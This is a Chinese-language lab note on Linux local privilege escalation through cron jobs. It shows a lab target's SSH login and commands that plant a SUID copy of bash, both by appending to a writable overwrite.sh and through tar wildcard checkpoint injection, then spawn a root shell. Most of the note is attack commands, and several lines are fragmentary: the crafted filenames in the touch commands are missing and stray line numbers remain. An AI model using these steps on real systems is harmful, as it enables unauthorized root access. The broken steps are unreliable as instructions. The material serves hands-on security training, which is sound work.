| 靶机地址
ssh user@192.168.28.131
password123
|
计划任务中的相对路径&绝对路径
制作的视频教程:https://www.bilibili.com/video/BV1wA411Y79Q/
|
cat /etc/crontab
cat
find / -name "overwrite.sh" 2>/dev/null
ls -al /usr/local/bin/overwrite.sh
-rwxr--rw- 1 root staff 40 May 13 2017 /usr/local/bin/overwrite.sh
Linux 权限模型通过允许给每个文件系统对象设置三种独立的权限级别来工作 — 它们为文件的所有者、文件的组以及所有其他用户。
|
| cat /usr/local/bin/overwrite.sh
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
chmod +x /home/user/overwrite.sh
/tmp/bash -p
|
通配符与进度条提权
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| cat /usr/local/bin/compress.sh
对tar cxf的解释:https://whale3070.github.io/linux/2017/01/01/%E5%8E%8B%E7%BC%A9%E4%B8%8E%E8%A7%A3%E5%8E%8B%E7%BC%A9/
tar命令与checkpoint:https://www.gnu.org/software/tar/manual/html_section/tar_26.html
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
touch /home/user/
touch /home/user/
touch /home/user/
** (1) -b,
** BLOCKS x 512 bytes per record**
** 这个用于计算一个记录块是大小.是512的倍数**
** (2)
display progress messages every NUMBERth record (default 10)**
**这个用进度条显示信息,检测数据点的位置,是record为单位**
** (3)
execute ACTION on each checkpoint**
** 这个是每个checkpoint,可以自定义输出你想的信息**
|
计划任务——sh文件覆盖
| cat /etc/crontab
ls -l /usr/local/bin/overwrite.sh
chmod o=rw /usr/local/bin/overwrite.sh
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh
|
参考资料
https://github.com/sagishahar-zz/lpeworkshop
利用通配符进行Linux本地提权